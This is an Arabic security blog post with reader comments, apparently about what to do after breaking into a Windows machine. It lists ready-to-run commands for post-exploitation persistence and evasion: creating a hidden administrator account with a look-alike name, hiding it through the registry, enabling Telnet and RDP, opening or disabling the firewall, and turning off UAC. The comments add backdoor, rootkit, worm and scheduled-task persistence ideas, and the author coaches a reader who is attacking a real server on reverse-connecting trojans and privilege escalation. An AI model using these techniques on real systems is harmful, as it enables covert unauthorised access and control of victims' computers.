[نقاش] ماهو أول شئ تفعله بعد اختراقك لنظام ويندوز ؟!

لك منا بعض الخطوات التي يعملها بعد اختراق الويندوز, بعيد عن فكرة التخريب نفسها فمنا من يحب أن يرجع إلى النظام و منا من يحب أن يستخدم النظام في أغراض الهجوم أو التخفي , إلخ,,

لهذا أحببت أن نكتب كيف من الممكن أن نستفيد من النظام اللذي تم اختراقه و كيفيه المحافظه عليه للعودة إليه مرة أخرى و كيفية استغلال ذلك الاغتراق لصالحنا.

النقاش يشمل التالي:

  • ضمان العودة إلى النظام مرة أخرى
  • التقاط البيانات و كلمات المرور
  • تشغيل و إطفاء الخدمات
  • التعامل مع برامج الحماية (Antivirus , Anti Spyware , Firewalls)
  • مسح الأثار
  • مهارات أخرى

ملاحظة: سأجعل لكل نظام موضوع مستقل لكي يكون مرجعا لنا و سأقوم بتحديث الموضوع بناء على الإضافات من الزوار مع الحفاظ على حقوق المعلومة لمن أضافها


المستخدمين و المجموعات

حسنا في حالات التدريب و الاختراق التخريبي و الاختراق للتحدي ننشئ مستخدم بأسمائنا أو بألقابنا و لكني أحيانا أحبذ أن أستخدم أحد المستخدمين الموجودين و الغير مستخدمين أو إنشاء مستخدم شبيه بأسمائهم مع فارق بسيط في التجئة و التي قد لا ينتبه إليها مدير النظام.

إضافة مستخدم و كلمة مرور

net user USER_NAME USER_PASS  /add

مثال

net user KING sec4ar  /add

إضافة المستخدم إلى مجموعة المدراء Administrators

net localgroup administrators USER_NAME  /add

مثال

net localgroup administrators KING  /add

تغيّير كلمة مرور المستخدم

سيطلب منك إدخال كلمة المرور مرتين متتاليتين

ملاحظة: هناك مسافة بين اسم المستخدم و علامة النجمة “*

net user USER_NAME  *

مثال

net user  KING  *

Type a password for the user:
Retype the password to confirm:
The command completed successfully

لتقليل طول كلمة المرور المسموح بها

net accounts /minpwlen: length

مثال

net accounts /minpwlen: 0

هل تعلم أن بعد إضافة هذا المستخدم فإنه سيظهر في شاشة الدخول أو شاشة  الترحيب(Welcome Screen) في بداية تشغيل الويندوز؟!

لإزالة المستخدم من شاشة الترحيب(جعله مخفي)

1. اتصل فورا بالجهاز عن طريق الـ Remote Desktop

2. إذهب إلى قائمة إبدأ أو Start و اختر Run  و اكتب regedit.exe

3. اذهب إلى المسار التالي

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\

3.1. في الجهة اليمنى, ابحث عن اسم المستخدم الذي أنشأت و انقر عليه نقرتين و غيِّر قيمته إلى صفر = 0 . فإن لم تجده !, إضغط الزر الأيمن بالفأرة و أختر ” New > DWORD Value ”

3.2. و أنشئ مفتاح جديد بنفس اسم المستخدم الذي تريده بالظبط

3.3. اجعل القيمة تساوي صفر

هكذا لن يظهر

Reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v UserName /t REG_DWORD /d 0

شكرا لأخي زياد و أخي أبو الوليد

لتفعيل مستخدم افتراضي لكنه غير مفعل بشكل افتراضي في الويندوز

net user  USER_NAME  /acvtive:yes

مثال

net user  HelpAssistant  /acvtive:yes

الخدمات

لتفعيل و تشغيل خدمة معينة

sc config  Service_Name start= auto
net start  Service_Name

لعرض الخدمات الموجودة

sc query

الأن لنفعل الخدمات المهمة بالنسبة لنا

تفعيل الـTelnet

sc config TlntSvr start= auto
net start TlntSvr

تفعيل الـ Remote Desktop

sc config DcomLaunch start= auto
net start DcomLaunch

ملاحظة: يجب أن تفتح لهم Port  في الجدار الناري. سأشرح  ذلك لاحقا

المجلدات و الملفات

لمشاركة مجلد أو ملف

NET SHARE sharename /USERS:numer /UNLIMITED /REMARK:"comment"

مثال

NET SHARE C:\inetpub\ftproot /UNLIMITED /REMARK:"KING-SABRI_Security4Arabs"

تغيّر التصاريح

الحماية

لإغلاق الجدار الناري (الجدار الناري الافتراضي مع الويندوز)

netsh firewall set opmode disable

لا أحبذ هذه الطريقة لأنها تظهر إنذار بذلك و يحبذ فتح المنافذ المطلوبه فقط

netsh firewall add portopening TCP  PORT_NUMBER  "Serv.Name"

مثال

netsh firewall add portopening TCP 23 "Telnet"
netsh firewall add portopening TCP 3389 "RDP"

إغلاق الجدار الناري ISA

net stop mspfltex

لإغلاق UAC  (خاص بـ Vista ,Win7)

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

مسح السجلات “Logs”

جاري العمل عليه,,

نبذة عن الكاتب

المهندس صبري صالح. مهندس حماية شبكات و أنظمة و فحصها معالجة و تحليل الأحداث الأمنية و المسؤول عن تطبيق معايير الـ ISO 27001 , يعمل في بيئات متعددة المنصات. حاصل على عدة شهادات تقنية.

التعليقات:

اترك تعليقاً | عدد التعليقات: (20)

  1. يقول mrloong:

    السلام عليكم

    من اﻷظفات الي انا احب أضيفة برضوة هي اليوزر مثلآ
    admin
    او اضيف ادمن ثاني مع أختﻻف الأحرف مثل
    admistrator
    تلاحضون انا في العنية ما كتبت I بعد حرف S
    زي ما تقول حركة تموية في أسم المستخدم وأضيف يوزر زيادة في المجموعات خاصة اذا كانو عددت اليوزرات كثيرة

  2. يقول صبري صالح:

    عليكم السلام ,, و هذا ما ذكرته أنا في فقرة “المستخدمين و المجموعات” أول أسطر كتبتها

    أيضا أشرت إلى أننا نستطيع أن نفعل مستخدم موجود في الأصل لكنه لم يكن مفعل بشكل افتراضي و بالطبع سنضيفه إلى مجموعة المدراء

    شكرا لمرورك

  3. يقول واحد:

    طيب لو كان الجهاز بيستخدم Dyn IP وانا كمان بستخدمه وعاوز ارجع للجهاز تانى ايه الحل ؟

  4. يقول Hit-Man:

    السلام عليكم
    شكرا لك أخي على الدرس
    بالنسبة للأخ -واحد-فالطريقة المتداولة واللي تقدر أنك ترجع للموقع بعد اختراقه و هو الرووت كيت أخي
    وشكرا

  5. يقول بشار:

    أخي واحد كلام Hit-Man صحيح. ولكن إذا كنت تقوم بعمل Penetration Testing فعندها على الأغلب لن تستطيع استخدام روت كيت لأنّ هذا يخالف قواعد الإشتباك.

  6. يقول أبو الوليد:

    بالنسبة للخطأ المستفز أظنه والله أعلم من غياب ال quotes في المسار “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\” و الكلمة reg تتواجد قبل add أظنك نسيتها سهوا اخي صبري…
    متشكر على الموضوع المفيد.

  7. يقول صبري صالح:

    مرحبا أخي أبو الوليد ,,
    شكرا أخي على مساعدتك لكن ما لم أفهم موضوع الـ quotes حيث نستخدمها فقط إذا كان في الأمر أي علامات محجوزة أو مفاتيح للأوامر أو مسافة لكن هنا لا يوجد المكان المراد لا يوجد به مسافات ولا شئ.
    الأمر الأخر لقد وجدت بالفعل أن reg.exe قبل الـ ADD فما المشكة , قد أكون لم أفهم قصدك جيدا

    شكرا لمساعدتك و أتمنى أن نبني في هذا الموضوع قد المسطاع لكي يكون مرجعا لنا جميعا

    تحياتي و احترامي لك أبو الوليد

  8. يقول Try to be IT:

    السلام عليكم …..

    انا دائماً لا افكر كيف اضمن العودة إلى النظام مرة أخرى لانه مثل ما ثم اختراقه في المرة الاولي يمكن اختراقه من جديد ولكن لا يمكن استبعاد هذه النقطة انها مهمة فعلاً.
    ممكن عمل Task Scheduler في جهاز الضحية لي BackDoor تم رفعه في السابق وهذه النقطة صالحة في الحالتين Bind Shell و Reverse Shell .

  9. يقول majed_19845:

    السلام عليكم ورحمة الله وبركاته

    في بداية كلامي أحب أن أشكرك على اختيار هذا الموضوع للنقاش

    ومن أحد أفكاري بالموضوع لتثبيت الضحية ( العودة إليه مرة أخرى ) :

    – استخدام ال netcat كأداة backdoor وهذا يتطلب منك بعد الدخول إلى جهاز الضحية رفع النت كات + وضع أمر للإتصال بالهكر مع بداية تشغيل الجهاز

    – تشغيل خدمات على الجهاز، مثال ذلك ( ftp,telnet,tftp,smb …. )، وهنا يتطلب الموضوع رفع ال ftp server على جهاز الضحية + tftp server + تشغيل خدمة ال smb وال telnet

    – ويمكن أيضا استخدام ال msfpayload في الميتاسبلويت لعمل ملف تنفيذي exe وتشغيله على الجهاز ثم تثبيته عن طريق ال metsvc ( وهكذا سيشتغل مع بداية تشغيل الجهاز )

    – ويمكن أيضا استخدام دودة لنشر باكدوور في الجهاز ( وأي شيء يدخل إلى الجهاز مثلا الفلاش أو السيدي …. ) وذلك للحفاظ أكثر على الضحية

    – معرفة البرامج الموجودة على الجهاز مع اصداراتها والبحص عن ثغرات من نوع remote buffer overflow حيث يمكنك استغلالها وقت الحاجة لها

    هذا هي أفكاري الحالية
    إن شاء الله سيكون هنالك أفكار مستقبلية
    وياريت لو نشوف أفكار حول موضوع مسح الأثار

    تحياتي

  10. يقول Try to be IT:

    انا دائما الاختراقات التي اقوم بها يكون البيلود الدوس و المهم في الامر انه جميع الادوات التي تستعمل في بيئة الدوس جيد جدا

    مثل : ادوات سحب جميع الباسوردات المخزنة في الجهاز تعمل في بيئة الدوس طبعا يجب ان يكون لديك اف تي بي سيرفر لرفعها الي جهاز الضحية.

  11. يقول ali_m:

    السلام عليكم
    موضوع جميل لكن ماذا بشأن الحمايات ؟؟؟
    عندي سيرفر ويندوز 2003 لايقبل امر اضافة مستخدم او تشغيل \ايقاف خدمة
    sc config TlntSvr start= auto
    [SC] OpenService FAILED 5:

    Access is denied.
    مالحل بهكذا حالة ؟؟؟
    ودمتم

  12. يقول صبري صالح:

    @ Try To be IT : شكرا لإضافاتك أخي
    و طريقة تفكيرة جيدة , بالنسبة للـNetcat فهو ممتاز في السيناريوهات التجريببية , لكن عندما يكون على بيئة حقيقية فأنك لن تثق به لسهولة اكتشافه من المكافحات و أيضا قلة إمكانيات الـNetcat نفسه

    حاول تستخدم Trojan من الأشياء الحديثة و يكون لها عدة إمكانيات

    @ali_m: أخي تأكد أنك اخترقت بصلاحيات Administrator أو System أو مستخدم له صلاحيات المدير
    ما عدا ذلك لن تستطيع تنفيذ هذه الأوامر إلى بتصعيد صلاحياتك ممكن تستخدم “getsystem” في مشروع الميتاسبلويت

  13. يقول ali_m:

    الأخ صبري صالح
    شكرا لتعقيبك لكن لو توضح ماالقصد ب ?getsystem

  14. يقول صبري صالح:

    أخوي علي, هي أداة لتصعيد الصلاحيات على النظام في حين أن صلاحياتك هي صلاحيات مستخدم عادي

  15. يقول ali_m:

    أخ صبري كلامك سليم 100%
    طبقت أمر whoami وكانت النتيجة
    nt authority\network service
    رغم أن جميع محاولاتي للاختراق باستخدام مشروع metasploit فشلت لكن سأجرب getsystem الذي تحدثت عنه
    سؤال آخر :
    السيرفر خلف راوتر له real ip طبعا لكن هل يؤثر ذلك على تشغيل تروجان مشفر بالسيرفر حيث لم تنجح محاولتي بالتروجان
    وهل أستطيع (فيما لو تم تفعيل Rdp) الاتصال به ؟
    وشكرا للأخ صبري ولصاحب المدونة الرائعة

  16. يقول صبري صالح:

    استخدم الاتصال العكسي في التروجان

    بالنسبة للـ RDP افتح Tunnel لأنك لن تستطيع أن تتصل به مباشرة بالطريقة التقليدية لأن هناك NATing يحصل
    http://www.security4arabs.com/2010/08/12/hack-into-natted-network-via-ssh-tunnel/

    تحياتي واحترامي

  17. يقول عبدالرحمن:

    هذه نتيجة اختراق بالميتاسبلويت ماذا افعل بعد ذلك
    [*] Started reverse handler on 192.168.183.129:80
    [*] Automatically detecting the target…
    [*] Fingerprint: Windows XP – Service Pack 3 – lang:English
    [*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
    [*] Attempting to trigger the vulnerability…

  18. يقول احمد على:

    ارجو التواصل معاك للاهمية وشكرا

أكتب تعليق